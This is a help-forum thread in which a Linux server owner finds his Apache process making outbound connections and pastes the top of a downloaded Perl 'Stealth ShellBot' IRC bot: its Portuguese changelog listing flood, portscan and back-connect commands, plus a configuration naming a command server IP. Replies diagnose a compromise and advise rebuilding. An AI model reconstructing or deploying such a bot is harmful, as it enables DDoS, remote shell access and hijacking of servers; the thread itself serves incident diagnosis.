Linux Server Establishing connections to computers outside my network.

English Network/Internet
#1

Recently I start to experience problems with my server. Netstat show this:

tcp 0 1 192.168.0.5:52106 204.101.159.238:80 SYN_SENT 13448/httpd
tcp 0 1 192.168.0.5:38269 204.101.159.238:80 SYN_SENT 13530/httpd
tcp 0 1 192.168.0.5:53470 46.108.158.11:7575 SYN_SENT 19899/stream
tcp 0 1 192.168.0.5:38267 204.101.159.238:80 SYN_SENT 12238/httpd
tcp 0 1 192.168.0.5:52099 204.101.159.238:80 SYN_SENT 14109/httpd
tcp 0 1 192.168.0.5:59646 209.97.193.141:3303 SYN_SENT 16020/php
tcp 0 1 192.168.0.5:52107 204.101.159.238:80 SYN_SENT 11291/httpd
tcp 0 1 192.168.0.5:59648 209.97.193.141:3303 SYN_SENT 16100/php
tcp 0 1 192.168.0.5:59647 209.97.193.141:3303 SYN_SENT 15937/php
tcp 0 1 192.168.0.5:38271 204.101.159.238:80 SYN_SENT 13375/httpd
tcp 0 1 192.168.0.5:52100 204.101.159.238:80 SYN_SENT 20715/httpd
tcp 0 1 192.168.0.5:38270 204.101.159.238:80 SYN_SENT 14100/httpd
tcp 0 1 192.168.0.5:43743 209.97.193.141:3303 SYN_SENT 16187/php
tcp 0 1 192.168.0.5:38272 204.101.159.238:80 SYN_SENT 11293/httpd
tcp 0 1 192.168.0.5:43156 46.108.158.11:7575 SYN_SENT 19905/stream
tcp 0 1 192.168.0.5:38268 204.101.159.238:80 SYN_SENT 13298/httpd
tcp 0 1 192.168.0.5:52102 204.101.159.238:80 SYN_SENT 11287/httpd
tcp 0 1 192.168.0.5:38274 204.101.159.238:80 SYN_SENT 12231/httpd
tcp 0 1 192.168.0.5:52101 204.101.159.238:80 SYN_SENT 20721/httpd

I used iptables rule to block incoming and outgoing connection to the addresses:

204.101.159.238 (Canada)
209.97.193.141 (Canada)
46.108.158.11 (Romania)

The traffic show as my server is generating the connection but no body use the server to establish those connections. Can anybody let me know what happens?? Before set iptables the server generate so much traffic that overload my network. I think in spyware or trojan… but in linux?? seriosly??

Thanks for your help.

#2

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Well, these are coming from httpd, php, and stream (whatever that is).
It’s possible somebody hacked your box and is now using it for their own
purposes. If you do not know why Apace’s httpd is doing these things
then disable it, or maybe better yet, rebuild the box after backing up
whatever the server could be using to make these calls (.php files,
whatever). Maybe setup a LAN trace to see what happens when one of
these connections is actually made since here you do not see anything
other than the socket list.

Good luck.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.18 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJPTmZqAAoJEF+XTK08PnB5x1sP/05OiCMPs9QVrCVKm72g2gj7
njO1X4MqkZYskmdtd1A6DDC54QZmdYNzjZq4C5IUvqkm+GBhuMMTIYbzha2FcbCH
GutK7EV3NGwFlXDndJ3Wdjk+1QePMEIF6F1n1I7SnoacRvIngfzmKBG0VPdfsLje
+1C59tmyWT9mvbMB2+jbu0+ykeZ+cDDJnP7fhVpWmzScjzaSxBfISMVE2c81BBKt
PnPPgs4YwG4NqVTxeG9meLuKgjbtZjsURqFHG2rZOVr+aAGjYwmW+mpv2CVGp1uy
DKaqRiGr9DlodGi/uRYAMBQnpHbDxeeuPYZKotfYXUvUgLFbLXteUwjVnqTRqPl3
A2Alp4tUaWlePlHNQiXPEgWe/z9+BK4c5Lxm3Z9cOXnN8rQcDkKM3+x6hg9kRrQB
n/qiMwxQoREa4VzRfeO9wLmP6AnVzIhvGmA6pf5/wiAwosjpDEHUkm+PpGmjZ3uf
3MVe8hNSlNqSVqLgas8/Xr17t+6Mrxh0YcP1CFL8xmaml6lI35bO7yOiAxE6J51B
LpMFgAPTxrNmzbg26yGJ1Wq6odK35pFbn0UPJWZCSY/STcoRSS7m/BLJ/E5fH34d
Ncrg7uclAUrrIRntbtTj95IGx2xq1JuZhosH74OHdlCWQ2HVypummtY3CLlw7YeD
rtxpvleblcEA5orZVXHg
=0PJB
-----END PGP SIGNATURE-----

#3

I found this on my error_log for apache:

http://199.115.228.9
Saving to: vp.txt

and check that file on the address above (my antivirus block the connection as soon open) and this is the content of the vp.txt file:

#!/usr/bin/perl

- Adicionado comando !estatisticas ;

- Alterado o comando @pacota para @oldpack;

- Adicionado dois novos pacotadores: @udp e @udpfaixa ;

- Adicionado um novo portscan -> @fullportscan ;

- Adicionado comando @conback com suporte para Windows/Unix :D;

- Adicionado comando: !sair para finalizar o bot;

- Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;

- Adicionado comando !entra e !sai ;

- Adicionado comando @download ;

- Adicionado comando !pacotes para ativar/desativar pacotes :);

########## CONFIGURACAO ############
my $processo = ‘/usr/sbin/httpd -k graceful’;

$servidor=‘204.101.159.238’ unless $servidor;
my $porta=‘80’;
my @canais=("#au");
my @adms=(“v”,“p”);
my @auth=("!@max.ink");

Anti Flood ( 6/3 Recomendado )

my $linas_max=6;
my $sleep=3;

my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();

my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = “#”;
my $estatisticas = 0;
my $pacotes = 1;
####################################

my $VERSAO = ‘0.2a’;

$SIG{‘INT’} = ‘IGNORE’;
$SIG{‘HUP’} = ‘IGNORE’;
$SIG{‘TERM’} = ‘IGNORE’;

Comparing with the netstat result the same address that appear here was placed in vp.txt file.
I don’t post the full file content, but there is any other way to fix this without reinstall the full box?

Thanks for the help

#4

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

If you do not know why this file is here then your box is infected. How
much? Who knows. If I were you I’d backup anything important, scan
that backed-up stuff with as many malware/virus-scanners as possible (in
case they are infected in a way that will cause havoc in the future) and
wipe this box.

Good luck.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.18 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJPTok+AAoJEF+XTK08PnB5qB0P/2XcNaw9CfwyxleveG244amp
vj8ZGFJaH8nSExUESorAIAcRctaMJHH3DnIBZ6hDZJfiuRLNxtIYlJtmfDx9siW+
1CimJBCzx2zBquLjnWTDUylmgOoHPOA8wkJRuu3mbDG45kA+ySPfpuiQ2bBSjLyx
vnF7zjSkRKhuenZb4Q9gdyS5eJ/4Q92XywCCaj4ZlOov6r/suRMvON/jryC7PHxw
pbzPpq4DoX1BOrDnOqCZOfYCxPrhXVJfpjA1p9eB6mmqmZZwg25KkZXVH82X6Tok
rlLsT+90Xw7l8EiR+wASYEbT7rPBRR+VR2zxy5BDKIkTbn/9zLjeoMShfAJRsGjG
GhT8m2TPVhAEwgXJiWlxZVU491GC5DrctJJNfFYYjirmsNzNx5TCUR5zISpJatkH
WWX8uMDm1jXEeRshqfxjvjfMjmMxBQDegohSm+OCOXsD3DeaIcltD8zUp34SBA7L
Maienbabg2NkKoTx/d4oniNjFJW67zUswjh0Mu2c4RCwNhE+InSmbh5muMDA/G30
25YCmW/QAFI+CQ6X82BVPJ1JKTPURZ2WImZ26dmmsu/a6Jf0SIJW7OUJPmCJ0ZYY
2l6RMOiBj4fQHGuhUibVvHwOTe/8vtW3ZtBAO+m7QAWMSpom3g1f4mspZDMNplxg
GvJBKEigCpCj2dMzQdnS
=EKHQ
-----END PGP SIGNATURE-----

#5

Are you running some kind of Peer to Peer app?
Not just torrent apps, sometimes social networking apps or apps with social networking features (like Skype) can get really chatty.

Also, inventory what is running.
A starting point is top or htop, other monitoriing apps might also tell you more. You can use Wireshark for example to see what is inside some of the packets.

TS